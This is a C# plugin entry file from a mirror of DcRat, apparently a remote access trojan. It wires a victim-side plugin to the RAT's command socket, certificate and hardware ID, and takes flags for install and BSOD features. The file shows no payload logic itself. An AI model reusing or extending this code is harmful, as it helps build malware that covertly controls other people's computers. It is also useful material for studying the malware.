mirror of https://github.com/qwqdanchun/DcRat.git
34 lines
902 B
C#
34 lines
902 B
C#
using System;
|
|
using System.Collections.Generic;
|
|
using System.Diagnostics;
|
|
using System.Linq;
|
|
using System.Net.Security;
|
|
using System.Net.Sockets;
|
|
using System.Security.Cryptography.X509Certificates;
|
|
using System.Text;
|
|
using System.Threading;
|
|
|
|
namespace Plugin
|
|
{
|
|
public class Plugin
|
|
{
|
|
public static Socket Socket;
|
|
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bsod, string install)
|
|
{
|
|
Debug.WriteLine("Plugin Invoked");
|
|
Socket = socket;
|
|
Connection.ServerCertificate = certificate;
|
|
Connection.Hwid = hwid;
|
|
new Thread(() =>
|
|
{
|
|
Connection.InitializeClient();
|
|
}).Start();
|
|
|
|
while (Connection.IsConnected)
|
|
{
|
|
Thread.Sleep(1000);
|
|
}
|
|
}
|
|
}
|
|
}
|